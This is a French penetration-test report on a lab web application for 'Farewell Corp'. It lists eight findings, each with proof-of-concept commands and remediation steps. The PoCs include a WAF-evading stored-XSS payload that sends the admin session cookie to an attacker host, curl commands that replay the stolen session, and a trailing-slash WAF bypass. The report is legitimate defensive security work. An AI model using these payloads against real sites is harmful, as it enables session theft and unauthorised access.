Test d'Intrusion — Rapport Technique & Executif
Farewell Corp
Test d'Intrusion - Application Web - Black Box
Avertissement : Ce document est strictement confidentiel. Il contient des
vulnerabilites techniques sensibles concernant le systeme informatique de Farewell Corp.
Sa divulgation a des tiers non autorises est interdite. Les tests ont ete realises dans
le cadre d'une autorisation ecrite (RoE signe) conformement aux articles 323-1 a 323-7
du Code penal francais.
Contexte de la mission
A la demande de Farewell Corp, Odonia Cyber a realise un test d'intrusion en mode boite noire (black box) sur l'application web accessible a l'adresse http://10.128.159.197. La mission, realisee le 16 mai 2026 dans un environnement de laboratoire isole, avait pour objectif d'identifier les vulnerabilites exploitables par un attaquant externe sans aucun credential prealable, et d'evaluer le niveau reel de maitrise du risque cyber de l'organisation.
Objectifs et perimetre
L'objectif principal etait de determiner si un attaquant sans connaissance interne pouvait compromettre l'application et obtenir un acces administrateur. Le perimetre couvre l'application web PHP/Apache exposee sur les ports 22/TCP (SSH) et 80/TCP (HTTP), a l'exclusion de tout systeme tiers et de toute attaque par force brute SSH (restriction RoE). Aucun code source, identifiant ou document interne n'a ete fourni au testeur avant le debut de la mission.
Metriques globales
9.2/10
Score risque global
Verdict
Critique
Niveau de risque global : CRITIQUE
Compromission totale obtenue en moins d'une heure. Un attaquant externe, sans aucun compte ni connaissance prealable, peut exploiter la combinaison de vulnerabilites identifiees pour prendre le controle complet de l'application et du serveur hote. Trois failles critiques permettent a elles seules : l'execution de code arbitraire avec privileges root, le vol de session administrateur par injection XSS stockee, et la prise de controle totale du panel d'administration. Une action corrective immediate est requise avant toute remise en production.
Tableau de synthese
| ID |
Vulnerabilite |
Composant |
Criticite |
CVSS |
Exploitable |
ODN-2026-001 |
Serveur Apache en privileges root |
/etc/apache2 - Systeme hote |
Critique |
|
Oui |
ODN-2026-002 |
Stored XSS dans les messages utilisateurs |
POST /dashboard.php |
Critique |
|
Oui |
ODN-2026-003 |
Session Hijacking - acces panel admin |
/admin.php/ - Sessions PHP |
Critique |
|
Oui |
ODN-2026-004 |
Bypass WAF ModSecurity (trailing slash) |
/auth.php/, /admin.php/, /dashboard.php/ |
Haute |
|
Oui |
ODN-2026-005 |
Mots de passe faibles et devinables |
Systeme d'authentification - tous les comptes |
Haute |
|
Oui |
ODN-2026-006 |
Exposition de phpinfo() en production |
/info.php - Serveur Apache |
Moyenne |
|
Oui |
ODN-2026-007 |
Fuite d'indices de mots de passe via API |
/auth.php/ - Reponse JSON |
Moyenne |
|
Oui |
ODN-2026-008 |
Controle d'acces temporel non fiable |
/admin.php - Logique de controle d'acces |
Moyenne |
|
Oui |
Detail des vulnerabilites
Les fiches suivantes detaillent chaque vulnerabilite identifiee, sa preuve d'exploitation,
son impact metier et la correction recommandee. Les trois vulnerabilites critiques constituent
une chaine d'attaque qui a permis la compromission totale de l'application en une seule session.
Description
Le processus Apache httpd s'execute sous le compte systeme root (UID 0), comme confirme par l'exposition phpinfo(). Ce choix de configuration annule l'ensemble du principe de moindre privilege. Toute vulnerabilite permettant une execution de code distante (RCE) sur l'application - via une injection, un upload de fichier malveillant, ou une faille de bibliotheque - aboutit directement a un shell root sur la machine hote, sans necessiter d'etape d'escalade de privileges. C'est la vulnerabilite de configuration la plus grave identifiee durant cette mission.
Composant affecte
Processus Apache httpd — Systeme hote complet (UID 0)
Preuve (PoC)
# Extrait de la sortie phpinfo() accessible publiquement sans authentification :
$_SERVER['USER'] = root
$_SERVER['HOME'] = /root
# Confirme : tout processus enfant d'Apache (PHP, scripts) herite des privileges root
# Vecteur de lecture : curl http://10.128.159.197/info.php | grep "USER\|HOME"
Impact metier
En cas d'exploitation d'une Remote Code Execution (une faille permettant d'executer des commandes sur le serveur a distance), l'attaquant obtient un controle total sur le systeme hote en une seule etape - acces a tous les fichiers, bases de donnees, certificats et cles cryptographiques. Cet etat constitue la compromission maximale possible. Aucun mecanisme de cloisonnement des privileges ne limite l'impact d'une exploitation secondaire.
Remediation
Priorite immediate (24h). Modifier le fichier de configuration Apache sur Ubuntu (/etc/apache2/envvars) pour executer le processus sous le compte www-data : APACHE_RUN_USER=www-data / APACHE_RUN_GROUP=www-data. Verifier ensuite que les fichiers de l'application restent lisibles par ce compte et redemarrer Apache.
Description
L'application permet aux utilisateurs authentifies de soumettre des messages qui sont rendus dans le navigateur de l'administrateur sans neutralisation des balises HTML actives. Le WAF bloque les vecteurs XSS classiques (<script>, document.cookie en clair), mais ces filtres sont contournes par l'utilisation de l'attribut onload sur la balise <body> et par la fragmentation de la chaine "document.cookie" en concatenation JavaScript. Combinee au bypass WAF et a l'absence de cookie HttpOnly, cette vulnerabilite constitue le vecteur d'attaque principal ayant permis la compromission administrative complete.
Composant affecte
POST /dashboard.php — Formulaire de messages "farewell", rendu dans le panel administrateur
Preuve (PoC)
# Payload soumis dans le champ "farewell message" (bypass WAF par attribut onload + fragmentation) :
<body onload="new Image().src='http://192.168.129.5:4444/steal?x='+document['coo'+'kie']">
# Cookie admin recu sur le serveur attaquant (Python3 SimpleHTTPServer) :
GET /steal?x=PHPSESSID=g6dvbami0j9ftkvf0l3etuolhr
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 18_3_2...)
Referer: http://localhost/
# Resultat : cookie de session administrateur exfiltre avec succes
Impact metier
Tout utilisateur dispose d'un acces indirect au panel d'administration par vol de session. Un attaquant peut modifier, supprimer ou exfiltrer l'integralite des donnees de l'application, utiliser le serveur comme base d'attaques contre des tiers, ou deposer une porte derobee persistante permettant un acces indefini apres correction des autres failles. Impact estime : arret complet du service, perte de donnees irreversible, responsabilite juridique envers les tiers attaques depuis l'infrastructure compromise.
Remediation
Priorite immediate (30 jours). Appliquer une fonction d'assainissement HTML (htmlspecialchars() en PHP avec ENT_QUOTES et ENT_HTML5) sur tous les messages utilisateurs avant tout rendu dans le navigateur. Completer par une politique Content-Security-Policy (CSP) stricte en en-tete Apache : default-src 'self'; script-src 'self'. Elargir les regles WAF ModSecurity pour couvrir les event handlers HTML (onload, onerror, onclick) et les techniques de fragmentation de chaines JavaScript.
Description
Le cookie de session PHP (PHPSESSID) ne dispose ni de l'attribut HttpOnly (qui interdit l'acces au cookie depuis JavaScript) ni de l'attribut Secure (qui limite la transmission au protocole HTTPS). Une fois le cookie vole via la XSS stored (ODN-2026-002) et le bypass WAF (ODN-2026-004), il suffit de le presenter dans une requete vers /admin.php/ pour obtenir un acces administrateur complet. Aucune verification supplementaire (IP, User-Agent, double authentification) n'est implementee.
Composant affecte
/admin.php/ — Gestion des sessions PHP, configuration php.ini / session_set_cookie_params()
Preuve (PoC)
# Cookie vole via XSS : PHPSESSID=g6dvbami0j9ftkvf0l3etuolhr
# Utilisation combinee avec le bypass trailing slash :
curl -b "PHPSESSID=g6dvbami0j9ftkvf0l3etuolhr" http://10.128.159.197/admin.php/
# Reponse : HTTP 200 - Dashboard administrateur complet obtenu
# Acces confirme a la totalite des fonctions d'administration
Impact metier
Compromission administrative totale de l'application. L'attaquant dispose des memes droits que l'administrateur legitime : lecture et modification de toutes les donnees, gestion des utilisateurs, acces aux fonctions de configuration. En combinaison avec ODN-2026-001 (Apache root), tout acces admin peut potentiellement mener a une compromission systeme complete.
Remediation
Priorite immediate (30 jours). Ajouter les attributs HttpOnly, Secure et SameSite=Strict aux cookies de session PHP dans php.ini ou via session_set_cookie_params(). Implementer une regeneration de l'identifiant de session apres chaque authentification reussie (session_regenerate_id). Mettre en place HTTPS (prerequis pour l'attribut Secure). Envisager une verification d'empreinte de session (User-Agent + IP partielle) comme couche supplementaire.
Description
Le pare-feu applicatif ModSecurity applique ses regles de filtrage sur les URLs exactes. En ajoutant un caractere "/" final aux URLs protegees (/auth.php devient /auth.php/), le moteur de regles WAF ne reconnait plus le chemin comme correspondant a ses signatures et laisse passer la requete. Apache et PHP traitent ces deux formes d'URL de facon identique. Ce bypass contourne toutes les protections WAF sur les endpoints sensibles : blocage des payloads d'injection, restriction d'acces IP, et filtrage des methodes HTTP.
Composant affecte
ModSecurity WAF — Endpoints /auth.php/, /admin.php/, /dashboard.php/
Preuve (PoC)
# Requete directe - bloquee par le WAF :
curl -X POST http://10.128.159.197/auth.php -d "username=admin&password=test"
# Reponse : HTTP 403 - WAF is Active
# Requete avec slash final - WAF bypasse, reponse applicative obtenue :
curl -X POST http://10.128.159.197/auth.php/ -d "username=admin&password=test"
# Reponse : HTTP 200 - {"error":"auth_failed","user":{"name":"admin",...}}
Impact metier
Le WAF ModSecurity ne constitue plus une barriere de securite effective. Toutes les protections basees sur l'analyse de l'URL sont neutralisees. Cette vulnerabilite est un prerequis essentiel pour l'exploitation des vulnerabilites ODN-2026-002 (XSS) et ODN-2026-003 (Session Hijacking).
Remediation
Priorite haute (30 jours). Ajouter une regle ModSecurity de normalisation des chemins avant analyse, ou configurer Apache pour rediriger les URLs avec slash final vers leur equivalent sans slash (directive DirectorySlash Off). Appliquer une regle CRS de canonicalisation des chemins. Valider le comportement avec un test de regression post-correction.
Description
L'ensemble des comptes utilisateurs est protege par des mots de passe construits directement a partir des indices publics exposes par ODN-2026-007. Les trois comptes de la plateforme ont ete compromis durant la mission. Le compte admin est particulierement critique : son mot de passe suit un pattern previsible (nom de l'application + annee + caractere special) qui peut etre genere par des regles de brute-force standard.
Composant affecte
Systeme d'authentification — Tous les comptes utilisateurs de la plateforme
Preuve (PoC)
# Les trois comptes ont ete compromis par deduction depuis les indices publics :
# Compte deliver11 - hint "Capital of Japan + 4 digits" -> mot de passe deduit
# Compte nora - hint "lucky number 789" -> mot de passe deduit
# Compte admin - hint "the year plus a kind send-off" -> mot de passe deduit
# Verification de l'acces admin (pattern : nom_application + annee + caractere_special) :
curl -X POST http://10.128.159.197/auth.php/ -d "username=admin&password=[CONFIDENTIEL]"
# Reponse : HTTP 200 - Authentification reussie, session etablie
Impact metier
Compromission de l'ensemble des comptes utilisateurs, y compris le compte administrateur. Acces a toutes les donnees privees (messages, profils). En contexte de production avec donnees reelles, violation RGPD certaine et exposition de toutes les informations personnelles des utilisateurs.
Remediation
Priorite haute (48h). Forcer le changement immediat de tous les mots de passe actuellement en place (considerer l'ensemble comme compromis). Implementer une politique applicative : minimum 12 caracteres, combinaison obligatoire majuscules/minuscules/chiffres/caracteres speciaux, interdiction des mots du dictionnaire et des patterns lies au nom de l'application. Supprimer le mecanisme d'indices de mots de passe. Envisager un gestionnaire de mots de passe d'entreprise.
Description
La page /info.php, generee par la fonction PHP phpinfo(), est accessible sans authentification depuis internet. Elle divulgue la version exacte de PHP (8.3.6), la version d'Apache (2.4.58), l'utilisateur systeme executant Apache (root), le chemin racine du document web (/var/www/html), la liste complete des modules charges dont ModSecurity, et les variables d'environnement serveur. Ces informations constituent un plan detaille de l'architecture interne pour un attaquant et ont permis l'identification de la vulnerabilite ODN-2026-001.
Composant affecte
/info.php — Serveur web Apache, accessible sans authentification
Impact metier
Acceleration significative de la phase de reconnaissance pour un attaquant. Les informations divulguees ont directement permis l'identification du compte root Apache (ODN-2026-001) et la presence de ModSecurity (permettant de cibler le bypass WAF, ODN-2026-004).
Remediation
Priorite normale (48h). Supprimer le fichier /info.php de l'environnement de production. Si une page de diagnostic est necessaire pour des besoins internes, restreindre l'acces aux seules adresses IP d'administration via directive Apache (Require ip) et ne jamais exposer cette page sur internet.
Description
L'endpoint /auth.php/ retourne, en cas d'echec d'authentification, un objet JSON contenant le nom d'utilisateur confirme, la date du dernier changement de mot de passe, et un indice de mot de passe (password_hint). Ces indices sont directement exploitables pour deviner les mots de passe de tous les comptes. Cette vulnerabilite constitue un maillon essentiel de la chaine d'attaque aboutissant a la compromission de tous les comptes via ODN-2026-005.
Composant affecte
/auth.php/ — Reponse JSON retournee en cas d'echec d'authentification
Preuve (PoC)
# Requete avec identifiants incorrects - l'API retourne l'indice du mot de passe :
curl -X POST http://10.128.159.197/auth.php/ -d "username=nora&password=wrong"
# Reponse JSON retournee :
# {
# "error": "auth_failed",
# "user": {
# "name": "nora",
# "last_password_change": "...",
# "password_hint": "lucky number 789"
# }
# }
Impact metier
Enumeration complete des comptes utilisateurs et facilitation de la compromission des mots de passe par tout attaquant non authentifie. En combinaison avec ODN-2026-005, cette vulnerabilite a permis la compromission de l'ensemble des comptes de la plateforme.
Remediation
Priorite normale (48h). Modifier le code PHP de /auth.php pour retourner un message d'erreur generique unique en cas d'echec, independamment de la cause : un simple message "Identifiants incorrects" sans aucune information sur l'utilisateur. Supprimer definitivement le champ password_hint de la base de donnees et de tout affichage public.
Description
L'acces au panel /admin.php est conditionne par un mecanisme d'alternance temporelle (le serveur repond 200 ou 403 selon une logique de timing interne). Ce mecanisme n'est pas un veritable controle de securite : il est contourne par deux methodes independantes identifiees durant la mission - le bypass trailing slash (ODN-2026-004) et la presentation d'un cookie de session valide (ODN-2026-003). Un attaquant disposant d'une session active n'est pas affecte par ce controle temporel.
Composant affecte
/admin.php — Logique de controle d'acces applicative (couche PHP)
Impact metier
La protection du panel d'administration est illusoire. Toute tentative d'acces non autorise peut contourner ce controle via les methodes documentees en ODN-2026-003 et ODN-2026-004. Ce mecanisme cree un faux sentiment de securite sans protection reelle.
Remediation
Priorite normale (90 jours). Remplacer ce mecanisme par une restriction d'acces basee sur une liste blanche d'adresses IP administrateurs (directive Apache "Require ip") ou, preferablement, exiger une connexion VPN pour acceder au panel admin. Ce controle doit fonctionner independamment de la couche applicative PHP, au niveau de la configuration serveur.
Le plan suivant liste les actions correctives dans l'ordre de priorite recommande.
Les elements Critique et
Haute doivent etre traites avant toute
mise en production ou exposition internet.
Urgent
3 vulnerabilite(s) critique(s) identifiees -
correction requise sous 24 a 48 heures.
Contacter Odonia Cyber si une assistance technique est necessaire : odonia.fr
Horizon 1 - Actions Immediates (24-48 heures)
| ID |
Action corrective |
Criticite |
Responsable |
Delai |
Effort |
ODN-2026-001 |
Restreindre les droits du serveur web Apache - Configurer Apache pour s'executer sous un compte systeme dedie a faibles privileges (www-data), modifier /etc/apache2/envvars, verifier les permissions des fichiers applicatifs et redemarrer Apache. |
Critique |
Administrateur systeme |
24h |
Faible (<1j) |
ODN-2026-006 |
Supprimer /info.php de l'environnement de production - Supprimer le fichier ou restreindre l'acces aux seules IP internes d'administration via directive Apache. |
Moyenne |
Administrateur systeme |
48h |
Faible (<1j) |
ODN-2026-007 |
Supprimer les indices de mots de passe de l'API publique - Modifier /auth.php pour retourner un message d'erreur generique unique, sans information sur le compte ou l'indice de mot de passe. |
Moyenne |
Developpeur backend |
48h |
Faible (<1j) |
Horizon 2 - Actions a Court Terme (30 jours)
| ID |
Action corrective |
Criticite |
Responsable |
Delai |
Effort |
ODN-2026-002 |
Filtrer et assainir tous les contenus utilisateurs avant affichage - Appliquer htmlspecialchars() sur tous les messages avant rendu. Mettre en place une politique Content-Security-Policy (CSP) stricte. Renforcer les regles WAF ModSecurity sur les event handlers HTML. |
Critique |
Developpeur backend |
30 jours |
Moyen (1-3j) |
ODN-2026-003 |
Securiser les cookies de session PHP - Ajouter les attributs HttpOnly, Secure et SameSite=Strict. Implementer la regeneration d'ID de session apres chaque authentification. Mettre en place HTTPS (prerequis). |
Critique |
Developpeur backend |
30 jours |
Moyen (1-3j) |
ODN-2026-004 |
Corriger le bypass du WAF ModSecurity (trailing slash) - Ajouter une regle de normalisation des chemins avant analyse WAF ou configurer une redirection Apache des URLs avec slash final. |
Haute |
Administrateur systeme |
30 jours |
Moyen (1-3j) |
ODN-2026-005 |
Imposer une politique de mots de passe robustes et forcer le renouvellement - Forcer le changement immediat de tous les mots de passe (consideres compromis). Implementer : minimum 12 caracteres, complexite obligatoire, interdiction des patterns lies au nom de l'application. |
Haute |
Administrateur systeme / DSI |
30 jours |
Faible (<1j) |
Horizon 3 - Actions a Moyen Terme (90 jours)
| ID |
Action corrective |
Criticite |
Responsable |
Delai |
Effort |
ODN-2026-008 |
Remplacer le controle d'acces temporel par une vraie restriction - Implanter une restriction d'acces basee sur une liste blanche d'IP administrateurs ou un VPN d'administration dedie, au niveau de la configuration Apache (independant de la couche PHP). |
Moyenne |
Administrateur systeme |
90 jours |
Moyen (1-3j) |
| — |
Mettre en place un programme de mises a jour regulieres - Definir une procedure formelle de patch management pour PHP, Apache et Ubuntu : verification mensuelle au minimum, application dans les 48h pour les mises a jour critiques. |
Bonne pratique |
DSI / Administrateur systeme |
90 jours |
Faible (<1j) |
| — |
Conduire un audit complet du code source de l'application - Programmer un audit de code (test en boite blanche) pour identifier toutes les vulnerabilites d'injection et de controle d'acces non detectables en black box. |
Bonne pratique |
DSI / Odonia Cyber |
90 jours |
Eleve (>3j) |
Prochaines etapes recommandees
- Correction immediate (J+2) : Restreindre les droits Apache (root -> www-data), supprimer /info.php, corriger l'API d'authentification pour supprimer les indices de mots de passe. Ces trois actions sont realisables en moins d'une journee par l'administrateur systeme.
- Verification technique (J+30) : Retest Odonia Cyber sur les points critiques corriges - inclus dans la mission. Validation du filtrage XSS, de la securisation des cookies, du correctif WAF et de la politique de mots de passe.
- Plan de securisation long terme : Audit de code source complet de l'application (boite blanche), mise en place d'un programme de patch management formel, envisager l'integration d'un VPN d'administration et d'une authentification multifacteur pour le panel admin.
Odonia
Retest inclus : Un retest gratuit des vulnerabilites critiques et hautes
est prevu a l'issue des corrections. Contacter Odonia Cyber pour planifier la session :
odonia.fr
A - Commandes et outputs bruts
Les extraits suivants sont les outputs bruts obtenus lors de l'execution des tests.
Ils constituent la preuve technique des vulnerabilites documentees en Section 03.
A1 - Enumeration Nmap - Ports et services identifies
nmap -sV -sC -p 22,80 10.128.159.197
# Resultats :
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH (Ubuntu Linux)
80/tcp open http Apache httpd 2.4.58
# Enumeration Gobuster - Endpoints identifies :
# /info.php -> HTTP 200 (phpinfo - informations systeme)
# /auth.php -> HTTP 403 (bloque par WAF)
# /auth.php/ -> HTTP 200 (bypass WAF trailing slash)
# /admin.php -> HTTP 200/403 (alternance temporelle)
# /admin.php/ -> HTTP 200 (bypass WAF + session valide)
# /dashboard.php -> HTTP 302 (redirection si non authentifie)
A2 - Extraction des informations systeme via phpinfo()
curl http://10.128.159.197/info.php | grep "Server Software\|PHP Version\|DOCUMENT_ROOT\|USER\|HOME"
# Retour confirme :
# Apache/2.4.58 (Ubuntu)
# PHP 8.3.6
# DOCUMENT_ROOT : /var/www/html
# USER : root <-- Vulnerabilite ODN-2026-001 confirmee
# HOME : /root <-- Apache s'execute en root
A3 - Bypass WAF et extraction des hints utilisateurs (VULN-003/004)
# Requete directe bloquee (WAF actif) :
curl -X POST http://10.128.159.197/auth.php -d "username=admin&password=test"
# HTTP 403 - WAF is Active
# Bypass par trailing slash :
curl -X POST http://10.128.159.197/auth.php/ -d "username=admin&password=test"
# HTTP 200 - {"error":"auth_failed","user":{"name":"admin","password_hint":"..."}}
curl -X POST http://10.128.159.197/auth.php/ -d "username=nora&password=wrong"
# {"error":"auth_failed","user":{"name":"nora","password_hint":"lucky number 789"}}
A4 - Exploitation XSS Stored et reception du cookie admin (VULN-006)
# Payload XSS soumis via dashboard.php (contourne le WAF par attribut onload + fragmentation) :
# <body onload="new Image().src='http://192.168.129.5:4444/steal?x='+document['coo'+'kie']">
# Reception sur le serveur attaquant (Python3 SimpleHTTPServer port 4444) :
GET /steal?x=PHPSESSID=g6dvbami0j9ftkvf0l3etuolhr HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 18_3_2 like Mac OS X)
Referer: http://localhost/
A5 - Acces administrateur par vol de session (VULN-007)
# Utilisation du cookie exfiltre avec bypass trailing slash :
curl -b "PHPSESSID=g6dvbami0j9ftkvf0l3etuolhr" http://10.128.159.197/admin.php/
# HTTP 200 - Dashboard administrateur complet retourne
# Acces confirme a l'ensemble du panel d'administration
B - Captures d'ecran referencees
| Reference |
Description |
Finding associe |
Fichier |
Fig. 1 |
Page phpinfo() accessible sans authentification - revelation du compte root Apache |
ODN-2026-001 / ODN-2026-006 |
phpinfo_root_user.png |
Fig. 2 |
Reponse WAF 403 vs. reponse HTTP 200 avec trailing slash (comparaison) |
ODN-2026-004 |
waf_bypass_trailing_slash.png |
Fig. 3 |
Reception du cookie de session admin sur le serveur attaquant (XSS callback) |
ODN-2026-002 / ODN-2026-003 |
xss_cookie_exfil.png |
Fig. 4 |
Acces au panel administrateur complet avec le cookie vole |
ODN-2026-003 |
admin_panel_access.png |
C - References CVE et CWE
| ID Odonia |
CVE |
CWE |
CVSS v3.1 |
Description courte |
ODN-2026-001 |
N/A |
CWE-250 |
9.8 |
Execution du processus Apache avec privileges root - violation du principe de moindre privilege |
ODN-2026-002 |
N/A |
CWE-79 |
9.0 |
Cross-Site Scripting stocke - absence de neutralisation des entrees utilisateurs avant rendu HTML |
ODN-2026-003 |
N/A |
CWE-384 / CWE-1004 |
9.8 |
Absence d'attributs HttpOnly et Secure sur les cookies de session - vol de session facilite |
ODN-2026-004 |
N/A |
CWE-693 |
7.5 |
Contournement WAF ModSecurity par ajout d'un slash final (trailing slash bypass) |
ODN-2026-005 |
N/A |
CWE-521 |
7.5 |
Absence de politique de mots de passe - mots de passe devinables depuis les indices publics |
ODN-2026-006 |
N/A |
CWE-200 |
5.3 |
Exposition de phpinfo() en production - divulgation de l'architecture systeme complete |
ODN-2026-007 |
N/A |
CWE-209 |
4.3 |
Messages d'erreur d'authentification contenant des informations sensibles (indices de mots de passe) |
ODN-2026-008 |
N/A |
CWE-284 |
6.5 |
Controle d'acces applicatif base sur une logique temporelle non fiable et contournable |
D - Tests negatifs (controles valides)
| Test effectue |
Resultat |
| Injection SQL sur les champs d'authentification (/auth.php/) |
Non vulnerable |
| Tentative de traversee de repertoire (Path Traversal) sur les parametres URL |
Non vulnerable |
| Enumeration de fichiers sensibles (.env, .git, backup.sql, config.php) |
Aucun fichier sensible accessible |
| Test d'upload de fichier malveillant |
Aucun endpoint d'upload identifie |
| Injection de commandes systeme via parametres formulaires |
Non vulnerable |
| Connexion SSH par force brute (port 22) |
Non teste (restriction RoE) |
E - Integrite du rapport
Les empreintes numeriques ci-dessous permettent de verifier l'integrite de ce rapport
et des preuves associees. Tout ecart indique une modification non autorisee du document.
| Fichier |
SHA-256 |
Date de generation |
rapport_pentest.html |
A CALCULER A L'EMISSION OFFICIELLE DU RAPPORT |
16 mai 2026 |
plan_remediation.csv |
A CALCULER A L'EMISSION OFFICIELLE DU RAPPORT |
16 mai 2026 |
executive_summary.html |
A CALCULER A L'EMISSION OFFICIELLE DU RAPPORT |
16 mai 2026 |
Pour toute question relative a ce rapport, contacter Odonia Cyber :
odonia.fr — Normandie (Caen / Flers)
— ODN-2026-LAB001